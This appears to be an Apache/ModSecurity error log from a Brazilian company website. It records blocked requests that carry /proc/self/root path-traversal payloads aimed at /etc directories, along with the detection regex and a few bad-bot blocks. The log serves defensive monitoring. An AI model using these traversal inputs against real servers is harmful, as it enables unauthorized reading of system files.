[Mon Mar 16 13:24:09.231274 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.244.31:45066] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abguqXjZBu2q05ozVU9cFQAAAUI"]
[Mon Mar 16 13:24:42.744275 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:59216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abguyqQpVkWug9HeOt85SAAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:24:54.273635 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.243.203:53674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu1qQpVkWug9HeOt85XgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:25:00.096019 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:56220] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu3Jqj1wV0Si-OkefyPAAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:25:08.315405 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:41218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu5I6lpbStxTqkSktvrwAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:25:14.776473 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:41230] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu6v9ocpUE4ed4uDzzIwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:25:17.186982 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:42588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu7Zqj1wV0Si-OkefyQQAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:25:18.554904 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:42602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu7rABkC4fWIHEf8HuygAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:25:20.870172 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:42604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu8KTCbgAP5jq5Tegt4wAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:25:25.113474 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:59834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu9f9ocpUE4ed4uDzzJgAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:25:29.769313 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.241.46:39662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu-aTCbgAP5jq5Tegt7QAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:25:32.308272 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.241.46:50692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu_KTCbgAP5jq5Tegt7wAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:25:33.541505 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:50702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu_dSswJuvopo3lOhisAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:25:35.021668 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:59848] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgu_7ABkC4fWIHEf8Hu2gAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:25:42.540424 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:39240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgvBrABkC4fWIHEf8Hu8gAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:26:52.639771 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:50716] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgvTLABkC4fWIHEf8HveAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 13:26:55.133437 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:37914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgvT6QpVkWug9HeOt85gQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:27:02.245024 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.228.16:53046] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgvVrABkC4fWIHEf8HvgQAAAEg"]
[Mon Mar 16 13:28:37.008833 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:37920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgvtY6lpbStxTqkSktwGAAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:29:11.408989 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.244.31:51032] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgv15qj1wV0Si-Okefy4wAAAAQ"]
[Mon Mar 16 13:29:11.890934 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.241.46:46782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgv15qj1wV0Si-Okefy5AAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:30:16.324378 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:54504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwF46lpbStxTqkSktwVAAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:30:22.038481 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:60022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwHrysWC90G-1nBrBIawAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:32:01.504151 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:38974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwgbABkC4fWIHEf8HwVgAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
